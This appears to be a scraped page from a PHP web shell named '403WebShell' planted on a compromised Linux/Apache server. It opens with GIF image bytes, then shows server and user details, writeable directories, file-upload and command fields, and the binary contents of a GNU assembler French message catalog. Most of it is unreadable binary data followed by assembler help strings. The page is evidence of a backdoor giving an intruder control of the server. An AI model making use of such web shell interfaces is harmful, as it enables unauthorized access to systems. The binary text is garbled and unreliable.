GIF89a=( �' 7IAXKgNgYvYx\%wh&h}t�h%�s%x�}9�R��&�0%� (�.��5�SD��&�a)�x5��;ͣ*ȡ&ղ)ׯ7׵<ѻ4�3�H֧KͯT��Y�aq��q��F� !� ' !� NETSCAPE2.0 , =( ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g���E�������R���E����B�� ��ȸ��D���"�Ů� �H��L��D٫D�B�����D���T���H �G��A R�ڐ |�� ٭&��E8�S�kG�A�px�a��� R2XB��E8I���6X�:vT)�~��q�賥��"F~%x� � 4#Z�0O|-4Bs�X:= Q� Sal��yXJ`GȦ|s h��K3l7�B|�$'7Jީܪ0!��D�n=�P� ����0`�R�lj����v>���5 �.69�ϸd�����nlv�9��f{���Pbx �l5}�p� ��� �3a���I�O����!ܾ���i��9��#��)p�a ޽ �{�)vm��%D~ 6f��s}Œ�D�W E�`!� �&L8x� �ܝ{)x`X/>�}m��R�*|`D�=�_ ^�5 !_&'a�O�7�c��`DCx`�¥�9�Y�F���`?��"� �n@`�} lď��@4>�d S �v�xN��"@~d��=�g�s~G��� ���ud &p8Q�)ƫlXD����A~H�ySun�j���k*D�LH�] ��C"J��Xb~ʪwSt}6K,��q�S:9ت:���l�@�`�� �.۬�t9�S�[:��=`9N����{¿�A !R�:���6��x�0�_ �;������^���#����!����U���;0L1�����p% A��U̬ݵ��%�S��!���~`�G���� ���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5� ���^`8E�]�.�S���7 � �0�j S�D� z���i�S�����!���l��w9*�D�I�nEX��� &A�Go�Qf��F��;���}�J����F5��Q|���X��T��y���]� o ��C=��:���PB@ D׽S�(>�C�x}`��xJЬ�۠��p+eE0`�}`A �/NE�� �9@��� H�7�!%B0`�l*��!8 2�%� �:�1�0E��ux%nP1�!�C)�P81l�ɸF#Ƭ{����B0>�� �b�`��O3��()yRpb��E.ZD8�H@% �Rx+%���c� ���f��b�d�`F�"8�XH"��-�|1�6iI, 2�$+](A*j� QT�o0.�U�`�R�}`�SN����yae�����b��o~ S)�y�@��3 �tT�0�&�+~L�f"�-|�~��>!�v��~�\Q1)}@�}h#aP72�"�$ !� " , =( &7IAXG]KgNgYvYxR"k\%w]'}h}t�h%�g+�s%r.m3ax3�x�}9��&��+�!7�0%� (�.�SD��&��;�"&ײ)׻4��6�K� �@pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E �� �������E �´��C���ǶR��D��"Ʒ�ʱH��M��GڬD�B����D��T����G���C�C� l&�~:'�tU�6ɹ#��)�'�.6�&��Ȼ K(8p0N�?!�2"��NIJX>R��OM '��2�*x�>#n� �@<[:�I�f ��T���Cdb��[�}E�5MBo��@�`@��tW-3 �x�B���jI�&E�9[T&$��ﯧ&"s��ȳ����dc�UUρ#���ldj?����`\}���u|3'�R]�6 �S#�!�FKL�*N E���`$�:e�YD�q�.�촁�s \-�jA 9�����-��M[�x(�s��x�|���p��}k�T�DpE@W� ��]k`1� ���Yb ��0l��*n0��"~zBd�~u�7�0Bl��0-�x~|U�U0 �h�*HS�|��e"#"?vp�i`e6^�+q��`m8 #V�� ��VS|`��"m"сSn|@:U���~`pb�G�ED����2F�I�? >�x� R� ��%~jx��<�a�9ij�2�D��&: Z`�]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ܺN���>PAD�HD��~���n��}�#�� Q��S���2�X�{�k�lQ�2�����w�|2� h9��G�,m���3��6-��E�L��I�³*K���q�`DwV�QXS��peS��� qܧTS����R�u �<�a�*At�lmE� � ��N[P1�ۦ��$��@`��Dpy�yXvCAy�B`}D� 0QwG#� �a[^�� $���Ǧ{L�"[��K�g�;�S~��GX.�goT.��ư��x���?1z��x~:�g�|�L� ��S`��0S]P�^p F<""�?!,�!N4&P� ����:T�@h�9%t��:�-~�I<`�9p I&.)^ 40D#p@�j4�ج:�01��rܼF2oW�#Z ;$Q q  �K��Nl#29 !F@�Bh�ᏬL!XF�LHKh�.�hE&J�G��<"WN!�����Y@� >R~19J"�2,/ &.GXB%�R�9B6�W]���W�I�$��9�RE8Y� ��"�A5�Q.axB�&ة�J�! �t)K%tS-�JF b�NMxL��)�R��"���6O!TH�H� 0 !� ) , =( &AXKgNgYvYxR"k\%wh&h}h%�g+�s%r.x3�x�}9��&��+�R,�!7�0%� (�.��5��&�a)��;�"&ף*Ȳ)ׯ7׻4�3��6�H֧KͻH�T��Y��q��h� ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E$����� � ����$E$��"��D� � ������R��C��� E ��H�M��G�D� �B��ϾD��a��`1r��Ӑ�� �o~�zU!L�C'�yW�UGt����ll�0���uG�)A�s[��x� �xO%��X2�  P�n:R/��aHae+�Dm?# ǣ6�8�J�x�Di�M���j���5oQ7�- <! *�l��R2r/a!l)d� A"�E���� &� ;��c �%����b��pe~C"B���H�eF2��`8qb�t_`ur`e� w�u3��Pv�h""�`�Íx�LĹ��3� �~ֺ�:���MDfJ� �۵�W�%�S�X �؁)�@��:E��w�u�Sxb8y\m�zS��Zb�E�L��w!y(>�"w�=�|��s�d �C�W)H�cC$�L �7r.�\{)@�`@ �X�$PD `aaG:���O�72E�amn]�"Rc�x�R� &dR8`g��i�xLR!�P &d����T���i�|�_ � Qi�#�`g:��:noM� :V �)p����W&a=�e�k� j���1߲s�x�W�jal|0��B0�, \j۴:6���C ��W��|��9���zĸV {�;��n��V�m�I��.��PN� ����C��+��By�ѾHŸ:��� 7�Y�FTk�SaoaY$D�S���29R�kt� ��f� ��:��Sp�3�I��DZ� �9���g��u�*3)O��[_hv ,���Et x�BH� �[��64M@�S�M7d�l�ܶ5-��U܍��z�R3Ԭ3~ ��P��5�g: ���kN�&0�j4���#{��3S�2�K�'ợl���2K{� {۶?~m𸧠�I�nE�='����^���_�=��~�#O���'���o..�Y�n��CSO��a��K��o,���b�����{�C�� "�{�K ��w��Ozdը�:$ ���v�] A#� ���a�z)Rx׿ƥ�d``�w-�y�f�K!����|��P��=�`�(f��'Pa ��BJa%��f�%`�}F����6>��`G"�}�=�!o`�^FP�ةQ�C���`(�}\�ݮ ��$<��n@dĠE#��U�I�!� #l��9`k���'Rr��Z�NB�MF �[�+9���-�wj���8�r� ,V�h"�|�S=�G_��"E� 0i*%̲��da0mVk�):;&6p>�jK ��# �D�:�c?:R Ӭf��I-�"�<�="��7�3S��c2RW ,�8(T"P0F¡Jh�" ; 403WebShell
403Webshell
Server IP : 81.88.48.95  /  Your IP : 10.2.217.94, 216.73.216.227
Web Server : Apache
System : Linux opus03 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64
User : nobody ( 99)
PHP Version : 5.3.3-7+squeeze3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/locale/fr/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/locale/fr/LC_MESSAGES/gas.mo
'TA
 !5IO
icw>۱?6Z![LN\;C3+5_-t3v?yI:K>77¹LOGB2ں?
=M@I̻;ORF=D'"l>>ν,
K:>Hž;"JAm@Dj53@LbHEB-35. =O]>E*Gpi|"LBr?"N8g"HO	\-f$!%%%'M*]"42W' 
4!Vfy$42(7`}!#%& 83l
{3``E& 18@Dy-->BF",@m.$$%3'DF'e--G$u2E&x2+847l2##"#@#d#WA'F7n84*2?r&*(Q6z%/:,B4o"")$."Sv#"0348"m$23.1K }3243:n(/#1&2X2$'$*A6l##$#"Hk|-
!!56W4*+BXu+$,-7I16133P*44,4(a$#-)+ED&96393m449n:&A
3L3/10#I%m%%&6DF)!''%'&Mt &5 \"}+$-+4Y"3(5JS	[<e5*/03!d3#%.1i/C$Dd !Z# ~"!'2!Z"|*.600av!' $ Efz686<RgA
 9#Y5}()(;!Z|0 >6'u+-&?S)o%4 
.F-f)=!1<:n:=-A3o#&&4[r- "	*	 F	 g	2	6		%
#,
2P
0

3
2
2$A!f -FM l&@W%M,sT!*J5Z$""1O_|#1537*k"" 76n%/
'$0L }6*+ L2d,#
%!2%T?z,%(
<6s14A$a6$)@!O$q/$**A,`@O5/3/6=POJ>)*h0(00'O0w')(#;Q1m34/.8+g+&%+ -8 #f O q L!Rj!(!B!A)"5k","."s"kq#"#+$!,$+N$2z$/$1$%' %-H%7v%0%$%)&'.&(V&)&(&&&'$'?'U' o' ''$'"'&(8( U(v((&(&((&)F)c)))()#)#)#*C*!a* ****(*+'++S+2+2+7+7,/U,=,,,",-&<-(c- --/-/-,.F.(Y.....1. /1/L/2e/7//=/"0"A0d0+0(080"131P1p11$11*18162O2l2%2*212-3=3Z3k32}3373849949s424'4'5&05-W53525H5(57^74y7%7!707'85D8Lz8 8 8	9)9H9g9(99.999	4:>:R:m:$::::+:/;"4;*W;;7;;;<<28<<k<<6<$<;=bV=5==0>3>E>_>w>$>>(>$>!?4>?4s?!?!??	@'@B@4N@@#@)@@@A-AHA\AmAA,ABA&B 3B2TB:B'B%B'C%8C9^CC=CACB7DBzDD&D)D'E&FE#mE"E1EE'F<-H?jH H1H-H-+I/YIRII!IJ4=J$rJJ?J,J,K*JKuK$K*K7K6L"PLsLL7LLL#M!3MUM0sM5M M2M.NHANNNNN9NaO5O6O-OP.:PiP!P+PP-PDQbQ3~Q%Q%Q9Q;8R<tRR4R*S)1S)[S)S-S.ST'TFT\T4{T$T%TT3U3EU/yU<U'U+V5:V0pV"VV0V"W&2W3YW,W%W'W'X0XHXdX!yXXXXX/XY?YYY!nYYYYY Z%#ZIZfZ)ZZ ZZ3[;[T[ o[&[&[8[$\<\V\"s\)\\\\
](]$G]l]]]-]0]#^4<^&q^J^^7_f8_&___!_`z8`>`1a/$b.Tbbb&b&bc&,cScqcc;ccc	d3d.Cdrdd;d(d)e-1e)_e,ee*e*e!f$@f0ef)f$f'f&
g+4g`gmg<zg<gg(hI4h3~hhh#h

ii/iDiZipii/ii)ij,j8jWjuj3jjjk $kAEk-kDkkl&l-Al'ol'l,l*l(m.@mom*mm*m#m#n:nOndnxn,nnnn!n o=owoooo)oopp.7p2fppp$ppq#q&:q4aq"q(qqqr(r:rPrgr}rrrrr)rs-sGs#csssss stt3t6Pt!t$tt(t u,u,Kuxuu&uu&u v 9v)Zvvv3vvww1w$Lwqwww-w)wx%x*Expxxxx3x#y&/y'Vy)~yy-y*yz-0z%^z0z6z9z/&{#V{1z{{{{#{&|@|_| x| ||0| }%}D}-a}}(}})}
~&(~"O~)r~#~~$~C~-8*f+2*/'W?w4:='.e#"8ہ7:L:‚Cނ""3 V"w&փ$"?X"q,4(
6 Vw2Ʌ/'B+j) #!6Tj=
ʇ؇ 7Q1p$?Lj%<Ne=z(ĉ01<P()֊1'P/xNj(('Ph"+Ό%#?Sh%$͍*"7/Z++̎@9!Ln$Ǐ$"!+M+k(3͐  AXv(&2ؑ'1A)s 3ђ5G;*+œ.' &H6o,'!"4W(u'ƕٕ9Paz!Ж,	6Ul2'21M)+&՘4"1%T0z&ҙ
5(#^<)ۚ1$7)\*:/*)G!q2%Ɯ/'3D-x33ڝ52DAw17-#GQ<֟+% F3c"Ӡ5Mg)Jʡ)?V)q& ¢"">"O-r9ڣ%)=[{;/ɤ01O&1ڥ1(B`z'A`wħ<ۧ".;.j..Ȩ./&-V/)(ީ(&0Wh# ت-=Si""ǫ)%)2O/<!/Q n"ͭ5K+d*9ͮ;;C<./&JB6İ*E#i~7"$*0O#β-$Lq³ϳ$

"	0	:DPb+
ʹ۴"6Tm
%

"/>N:lֶ
0=R
_,m!"ط7+T/-޸)
-;Xjǹ۹ 'U<D"׺#;V p(/һ)(,U.m*Ǽ".&U.s!ҽ*3 D3e#2Ӿ0'7_&t/;˿%A\|12(.*W*6	@,R05  ADN!!$/,#5"Y|&-
%"1T3p4'!6R0g'#%4Zn!$%$-1!_&%?Zu)D.!s',>Xp5R-g,+I ,jD1%'>3f!(>"$'G/o1(%& 
G0R&2+%	#/5S%<Y%v#-%9&T0{.G'70_$%#*N#m'+, *M%x4%%5O,h)'(#*47_"*,-++Y(D'
45>j5 .D*["#+,#I#m,0Ke%z*0:L7h"%+!C"e/%
4!Bd#&#Fj'07 hB#)8L^rA4J

 (3I:} !%Ga1+!"6A.x !*G"c'% 1CTfw
*9IZl}/@Rbu-EVf
v-)001P&,3J,~1!)B<b1+A%?'e(D#)Mjn{**@F(@B;(V_{|[=FG]=_DKLTS2?F`
nV>HDJLddEcRs>]!cNU7*Kb>H;6"rJ@]!	w	=	H5
>~

LGY*5
G
114jf2W\\z4_%P\"TswJ"6TY.S,&'3223e8'829Wq5"+3-;Gi<B 1
R`6}-0B"e
|<jjd("!2=@pK
%4.cvH%2xE-s - D -"@B"/"".x$$6^%-%*%)%&=&/.'6^'5'I'@("V(7y(+(+(%	)%/),U)+)+)u)RP*5*F*I +0j+9+=+N,3b.1.K../5C/?y/5/3/#0&'0&N0/u0030%01$;1`13z13141%20=22n232?293/O3C373C37?4"w44+454/51J55|52575'61E6w6+6E65	76?7 v7!747.78,8I8/]88888-8<(9Be9:999;:L:"d:":/:!:,:0); Z;>{;8;6;B*<Bm<7<<;=C<=8=0=1=.>&K>4r>1>>S>0H?y?1?-?B?77@'o@"@"@@D@85AnA A;A0ADBCaB7B9BC42CgC-C*C CC1D*OD
zD
D
DQD6D+-E%YE%E$E%EEFF,FBF%WF}F"F2F+F.G&NGuG3G(G3G:%H#`HH*H"H.HII	ID&IRkI9I6I6/J0fJFJJJ'L,L4M@DMMS
NaN%NLN'NO9O WO!xO"OO!Q*QQ$R1R!LR)nRR#R8R:S<PS,SSSS'T00TaTzT(T(TTTFUFcUDUU
V%%VKVeV~VIVVV*W*GWCrWWCW9XFXbX/|X#X!X!X9Y#NY!rYYQY2Y(1ZZZAtZ:Z Z[&*[1Q[[/[<[$\1\/L\@|\<\W\1R]-]I]H]&E^Nl^V^4_PG_;_+_#`($`4M`/`` `!`,a>@a)a*aa-a("bEKbEbb2b0'c<Xc:cc7c6&d]d+md1d,d9dM2e[e%e0fI3f}f+h5.hdhavh*h)i-i@@ii%i-i&ij 5jVj.ijjj jCj/kQ>kCk2k(l,0l]l${l(lBl#m0mLm5^m+mm/m>n!Gnin8nn7n9o&:o9aoo/o1op'"p Jp2kpQp:p9+q<eqAqq;r!?rar&trErr%r*%s)PsJzs:s8t9t)Ht1rtDt-t5u2Mu'u,uuuvv2vRGvcv8v<7w>twEwWw_QxWxQ	y,[y:yFyE
zEPzEzEzE"{2h{1{{{ {@ |5a|9|8|;
}7F}.~}*}*}3~97~&q~^~~"b-=6^tLӀ; >\.3;3&1Z;;ȃ6;&L.s?;8,W..22H!d!ӆ/,%R0o+/̇*('"Ps04ˆ)*!Li-$$01b#&(͊ /7,g,338)8b4JЌ!=#Z~(.Ǎ&.<.k-Ύ# ;N;g&#ʏ:BG@&&	"00S2=) #@dw%2ΒBD^%~3,ؓ<2B!u3@
CKAAѕ>.R57<7,=d*+'V?~-="I6lW$ @_}1<JHԜ'#36F>})0"B:$}&Ȟ6B&$i7.ƟHt>85;#P!t";40F'wGA')%Q&w'&ƣ> <.]5¤"Ԥ1Ga0UХ0&$W3|>0. 4O0? JOaPPS1c/0ũ2))(S9|#ڪO[T/C08t8L3$Я%#=?$}D118/j1ױE	DO%Ӳ=/$G'l($=E (f4 ĴU;K(i=>o>9'8G- 8Ϸ4(W]5Ѹ&&.CU?@ٹ35N/...-A<o(4H08y8>@G@Pɽ7@RL0$63R'/>޿0%N,t,$
8#\x6(5"M$p$+ ;(\- $=Rm))?(:c*02(N)w)$#.34b.C2
Z=#E(-0'^@BQ210/J/z/;/Fe`	H>aBA+V:?;9-W-'!?4=.r2+56CFPF2e-<(	2?Tj;*4*_}&E 0 Q rR/G6~02974*l882	=</z5$;3Au/2!M-o$%#&=&X-.'A@Y$/*J*f7*4&)"Ps/7%g.!%$Jg1" A6x31+B5b(*Ba<<6Lh1-;61r#*<!0#R&v$6,<&4c:?5+)a95=E9HB0C<(#(, 3T3l32&&%M s5398.Q
042%'M)_JA-D8P@7=$@Ve=CB>776R(Q{POnI4/,K;x5&1Xu%/J"6:Y...E!,g,4'-\9>'#;_z
E	!;]${<*R)[B	%2/8b8N$#.H.w ;*>.$m",,#&J*c).?59+o+67<6/s4#)>&:e<QH%_*/5&49[*%(25&h,)	)2	-\			*	D	0
 C
@d
B
W
@0Z087,-:Z68#
%A
)g
-
'


*I<$)
7/V"  7,#.P99<
:G=;$#!6E3|&"H+_?,F8\LMY0;,- !.B%q8&23*7^789IA495P0C72,0!];&)!?az+]6Z!)5()<(f!+8
HF06#'0X=o2,$' :L " @ ! <
!J! j!! !!!/!""2"K"K]""""&"#A.#*p#<#?#<$<U$<$B$B%BU%2%1%1%0/&`&t&&,&&%&':9't'''&'%'*(2@(s(.(@(6(J5))))') )&*)5* _**"*.**+$+7B+:z++:+G,FS,G,9,9-.V-`-A-)(.R.4p.]./)/@/FX/4/%/1/=,0,j0#000001C!12e111111
1&
2*42_2n2
}2
222"2#22213*B3*m3C3334 "4C4,X44444445E"5h5555!5556&6
B6P68a6"6%6$6#7,7J70h757478C8\8o88888)89/9!K9&m9=9{9\N:*:#:0:+; I;*j;7; ;C;12<,d<(<B<><<=([=+=0==;><>\>.t>8>>>-?H=?2??7?6	@1@@r@%@-@C@!A?A"^A#A#ABA;B$HBmB(B/BBBC0)C#ZCF~CC=C7DAWD*D D!DE]E-qE-E+E;E	5F/?F+oFF4F)F6	G@G,SG%GG7G G=H1\HH?HH9I$:I-_III%I&I
JJ"/JRJ*qJ-J/J7J-2K`KK$KK(K/L0LJLdLLLL>L
MI,M,vMMMM8MD,NqNNN(NN 
O .OOOkO>OO)O7
P:EPP&PVP-QK=Q7QQQ.QE+R"qR4RIR%S39S3mS5S+S*T+.T
ZT=eT3T?T8U4PU$U>UU(V41VfVVJVV-W&:W*aWW8W/WW-X9GX9XXUX0%Y9VYYY1YY-Z(HZ&qZ(Z3ZZ4[I[/h[3[0[	[<\D\,V\,\ \\;\.-]-\]C]%]-]<"^._^ ^4^7^<_3Y_"_1_K_<.`2k`D`>`&"aIa^a{aa+aaa"a#b*;b+fb&b)bb+b c5cScfcccc,c-c!+d!MdHod!dId$e!8e(Ze,e6e!e(	f>2f&qf&f*f fg/g$Jgogg'ggggg+h(Bhkhhhhhh
i2 i0Si&iMi+i)%jOjkjzjjjjjjjk"$kGkF\k7kkk"l4lQlalzl!l6l=l%0mVmomm.mm#m"n<5n,rn/n,n@n;=o(yo(oo$o@
p#Np'rp9pp)pq*q@qWqmqqqqqqq	rr1rGr[rorrrrrrrss4sKsbsxsssssstt.tCt[totttttttu(uEubuxuuu8u,uvE9vEv>v3w08wiw1ww9w>x7Ox<xxx+xy+4yA`y3y8yRz>bz0zzAz(.{KW{'{#{{O<0r
_QV1w`Lb02`U&G*'Oo:Ph~[G3-?H
\J-mq(p7gk Pk9.GzeFUjR<~i
OlNGtyV\m&nvr={P=SbVH!h1/?V
%y/+{XK_i*mv1Od2 .Q~7=6b(!3@#%t+teRZY' aeC;:P
R&N&a(.
o[g\,+c5N4
gr/;LoU_q6+hI,2:1;bIXo#C{"e:ZnA8{49WCK#Mw(	c"#!pWeUPaZ? ~K?<\$J<2vYY'(BLcbn]af7^i|~x	;iSQ%RBj,	/S@|Jn%Jw7gv;m	h] 3?fu`RyaIOw|*UxLYVD<E@AJ`p+},S7dS"Pl+_w"sg[XSUFho$H`_
(WK{Ql\py}dDj_qJBx>R&"Z,&}c`MmWrudC'EPkzJ|M5x(A-e
"|, #'n1$-YUE
jBf@)Mqu|*amHj3
47>;>0}4^Y$);D8#*a|/d%T|3vrEw^o
G@?`I^5MtZL5F9DA8^$mfCX{^UI[}XMWC5zvz 8Qc]O}!7tK6 !":q6(\T
eWc[g	B"D-.{4s*[pQ8h>h&]yp0&D6Vrrx3E=m6@g$#z{j./6H-Kq)>2?=j;fnsMy:/@aEdZ9[TrnZ`,+pQfI:+$H0T2CI9>-kzo=gx*]TXH'!1%_dGu=EwY5q%u
>>)-ScsE !R/BxKR0kl.F?IFuO$i4G
<,
b4:x971]l
_qs$'f9Tz^VGX~NL.)3N2MST)B}
i%2NLctp^ktn9NTi5FWo'81FbfAbKuBP}iyYDV8J0)A'z~k%#	<wsse3!<h&*6v]HC8	t@=	04.N~)Z\!u][OAv\sdWjllyD"QLAk5XlF#				[default is %d]
			[default is %s]
	 %s

			specify variant of 960 architecture
-b			add code to collect statistics about branches taken
-link-relax		preserve individual alignment directives so linker
			can do relaxing (b.out format only)
-no-relax		don't alter compare-and-branch instructions for
			long displacements

			specify variant of SPARC architecture
-bump			warn when assembler switches architectures
-sparc			ignored
--enforce-aligned-data	force .long, etc., to be aligned correctly
-relax			relax jumps and branches (default)
-no-relax		avoid changing any jumps and branches

D30V options:
-O                      Make adjacent short instructions parallel if possible.
-n                      Warn about all NOPs inserted by the assembler.
-N			Warn about NOPs inserted after word multiplies.
-c                      Warn about symbols whoes names match register names.
-C                      Opposite of -C.  -c is the default.
                          Registers will not need any prefix.
                          Registers will require a `$'-prefix.
                          emulate output (default %s)
             Record the cpu type
        -V                print assembler version number
        -Qy, -Qn          ignored
        S390 options:
        -mregnames        Allow symbolic names for registers
        -mwarn-areg-zero  Warn about zero base/index registers
        -mno-regnames     Do not allow symbolic names for registers
        -m31              Set file format to 31 bit format
        -m64              Set file format to 64 bit format
  --MD FILE               write dependency information in FILE (default none)
  --defsym SYM=VAL        define symbol SYM to given value
  --execstack             require executable stack for this object
  --fatal-warnings        treat warnings as errors
  --help                  show this message and exit
  --itbl INSTTBL          extend instruction set to include instructions
                          matching the specifications defined in file INSTTBL
  --listing-cont-lines    set the maximum number of continuation lines used
                          for the output data column of the listing
  --listing-lhs-width     set the width in words of the output data column of
                          the listing
  --listing-lhs-width2    set the width in words of the continuation lines
                          of the output data column; ignored if smaller than
                          the width of the first line
  --listing-rhs-width     set the max width in characters of the lines from
                          the source file
  --no-underscore         User symbols do not have any prefix.
  --noexecstack           don't require executable stack for this object
  --pic			Enable generation of position-independent code.
  --statistics            print various measured statistics from execution
  --strip-local-absolute  strip local absolute symbols
  --target-help           show target specific options
  --traditional-format    Use same format as native assembler when possible
  --underscore            User symbols are normally prepended with underscore.
  --version               print assembler version number and exit
  --warn                  don't suppress warnings
  -D                      produce assembler debugging messages
  -EB                     assemble code for a big-endian cpu
  -EL                     assemble code for a little-endian cpu
  -I DIR                  add DIR to search list for .include directives
  -J                      don't warn about signed overflow
  -K                      warn when differences altered for long displacements
  -L,--keep-locals        keep local symbols (e.g. starting with `L')
  -M,--mri                assemble in MRI compatibility mode
  -N                      Warn when branches are expanded to jumps.
  -Q                      ignored
  -R                      fold data section into text section
  -V			  print assembler version number
  -Qy, -Qn		  ignored
  -W  --no-warn           suppress warnings
  -Wnp                    synonym for -no-warn-explicit-parallel-conflicts
  -Wnuh                   synonym for -no-warn-unmatched-high
  -Wp                     synonym for -warn-explicit-parallel-conflicts
  -Wuh                    synonym for -warn-unmatched-high
  -X                      ignored
  -Z                      generate object file even after errors
  -c                      print a warning if a comment is found
  -f                      skip whitespace and comment preprocessing
  -fixed-special-register-names
                          Allow only the original special register names.
  -globalize-symbols      Make all symbols global.
  -gnu-syntax             Turn off mmixal syntax compatibility.
  -h, -H                  Don't execute, print this help text.  Deprecated.
  -linker-allocated-gregs If there's no suitable GREG definition for the                          operands of an instruction, let the linker resolve.
  -m32r                   disable support for the m32rx instruction set
  -m32rx                  support the extended m32rx instruction set
  -mall-opcodes    accept all AVR opcodes, even if not supported by MCU
  -mno-skip-bug    disable warnings for skipping two-word instructions
                   (default for avr4, avr5)
  -mno-wrap        reject rjmp/rcall instructions with 8K wrap-around
                   (default for avr3, avr5)
  -mip2022               restrict to IP2022 insns 
  -mip2022ext            permit extended IP2022 insn
  -mrelax                   Enable relaxation
  -mv850                    The code is targeted at the v850
  -mv850any                 The code is generic, despite any processor specific instructions
  -mv850e                   The code is targeted at the v850e
  -mwarn-signed-overflow    Warn if signed immediate values overflow
  -mwarn-unsigned-overflow  Warn if unsigned immediate values overflow
  -n                      Do not optimize code alignment
  -q                      quieten some warnings
  -no-expand              Do not expand GETA, branches, PUSHJ or JUMP
                          into multiple instructions.
  -no-merge-gregs         Do not merge GREG definitions with nearby values.
  -no-predefined-syms     Do not provide mmixal built-in constants.
                          Implies -fixed-special-register-names.
  -no-warn-explicit-parallel-conflicts  do not warn when parallel
  -no-warn-unmatched-high do not warn about missing low relocs
  -nocpp                  ignored
  -o OBJFILE              name the object-file output OBJFILE (default a.out)
  -relax                  Create linker relaxable code.
  -w                      ignored
  -warn-explicit-parallel-conflicts     warn when parallel instructions
  -warn-unmatched-high    warn when an (s)high reloc has no matching low reloc
  -x                      Do not warn when an operand to GETA, a branch,
                          PUSHJ or JUMP is not known to be within range.
                          The linker will catch any errors.  Implies
                          -linker-allocated-gregs. (Requires %s; requested architecture is %s.) *input_line_pointer == '%c' 0x%02x
 ARM-specific assembler options:
 FR30 specific command line options:
 M32R specific command line options:
 MMIX-specific command line options:
 V850 options:
 XSTORMY16 specific command line options:
 Z8K options:
  -z8001                  generate segmented code
  -z8002                  generate unsegmented code
  -linkrelax              create linker relaxable code
!%s does not use a sequence number!samegp reloc against symbol without .prologue: %s"%d" (instance number %d of a %s label)".else" without matching ".if"".elseif" after ".else"".elseif" without matching ".if"".endif" without ".if"# Example of `%s' instructions
	.sect .text
_start:
# bars register# conflicts length#4 not valid on H8/300.#<imm16>#<imm8>#<mask>% operator needs absolute expression%d error%s, %d warning%s, generating bad object file%d error%s, %d warning%s, no object file generated%d warnings, treating warnings as errors%s -- statement `%s' ignored%s NOP inserted%s `%s' already has an alias `%s'%s register same as write-back base%s relocations do not fit in %d bytes%s relocations do not fit in %d bytes
%s shortened to %s%s symbol recursion stopped at second appearance of '%s'%s unsupported%s without %s%s: data size %ld
%s: global symbols not supported in common sections%s: no such section%s: output of 1st instruction is the same as an input to 2nd instruction - is this intentional ?%s: output of 2nd instruction is the same as an input to 1st instruction - is this intentional ?%s: total time in assembly: %ld.%06ld
%s: unexpected function type: %d%s: unrecognized processor name%s:%u: bad return from bfd_install_relocation: %x'%s' is not repeatable. Resulting behavior is undefined.'%s': only the NOP instruction can be issued in parallel on the m32r')' required'[' expected after PLD mnemonic'entry_num' must be absolute number in [0,31](PC)+ unpredictable(unknown reason)*<abs8>-%s conflicts with the other architecture options, which imply -%s-(PC) unpredictable--gstabs is not supported for ia64--no-underscore is invalid with a.out format-32			create 32 bit object file
-64			create 64 bit object file
-32			create o32 ABI object file (default)
-n32			create n32 ABI object file
-64			create 64 ABI object file
-32 is supported for ELF format only-64 is supported for ELF format only-EL			generate code for a little endian machine
-EB			generate code for a big endian machine
--little-endian-data	generate code for a machine having big endian
                        instructions and little endian data.
-G may not be used with SVR4 PIC code-G n         Data >= n bytes is in small data area
-G not supported in this configuration.-KPIC			generate PIC
-V			print assembler version number
-undeclared-regs	ignore application global register usage without
			appropriate .register directive (default)
-no-undeclared-regs	force error on application global register usage
			without appropriate .register directive
-q			ignored
-Qy, -Qn		ignored
-s			ignored
-R option not supported on this target.-TSO			use Total Store Ordering
-PSO			use Partial Store Ordering
-RMO			use Relaxed Memory Ordering
-call_shared is supported only for ELF format-expand-pt32 invalid together with -no-expand-expand-pt32 only valid with -abi=64-k			generate PIC
-mCPU			equivalent to -march=CPU -mtune=CPU. Deprecated.
-no-mCPU		don't generate code specific to CPU.
			For -mCPU and -no-mCPU, CPU must be one of:
-mPIC        Note large position independent code
-mabi is supported for ELF format only-mcpu=<CPU version>       Specify the CPU version
-mdouble     Note fp double insns are used
-mdword      Note stack is aligned to a 8 byte boundary
-me <filename>            Redirect errors to a file
-merrors-to-file <filename>
-mfar-mode | -mf          Use extended addressing
-mfpr-32     Note 32 fprs are used
-mfpr-64     Note 64 fprs are used
-mgp32 used with a 64-bit ABI-mgp64 used with a 32-bit ABI-mgp64 used with a 32-bit processor-mgpr-32     Note 32 gprs are used
-mgpr-64     Note 64 gprs are used
-mips16			generate mips16 instructions
-no-mips16		do not generate mips16 instructions
-mlibrary-pic Compile library for large position indepedent code
-mmedia      Note media insns are used
-mmuladd     Note multiply add/subtract insns are used
-mno-dword   Note stack is aligned to a 4 byte boundary
-mno-pack    Do not allow instructions to be packed
-mpack       Note instructions are packed
-mpic        Note small position independent code
-mrelocatable		support for GCC's -mrelocatble option
-mrelocatable-lib	support for GCC's -mrelocatble-lib option
-memb			set PPC_EMB bit in ELF flags
-mlittle, -mlittle-endian, -l, -le
			generate code for a little endian machine
-mbig, -mbig-endian, -b, -be
			generate code for a big endian machine
-msolaris		generate code for Solaris
-mno-solaris		do not generate code for Solaris
-V			print assembler version number
-Qy, -Qn		ignored
-msoft-float Note software fp is used
-mtomcat-debug Debug tomcat workarounds
-mtomcat-stats Print out stats for tomcat workarounds
-n32 is supported for ELF format only-no-expand only valid with SHcompact or SHmedia-no-mix is invalid without specifying SHcompact or SHmedia-non_shared is supported only for ELF format-shcompact-const-crange is invalid without SHcompact....COMMon length (%d.) < 0! Ignored..COMMon length (%ld.) <0! Ignored..COMMon length (%lu) out of range ignored.EQU must use a label.EXIT must appear within a procedure.REG expression must be a register.REG must use a label.SCOMMon length (%ld.) <0! Ignored..abort detected.  Abandoning ship..begin directive with no matching .end directive.begin directive without a preceding .ent directive.begin directive without a preceding .file directive.begin/.bend in different segments.bend directive names unknown symbol.bend directive without a preceding .ent directive.bend directive without a 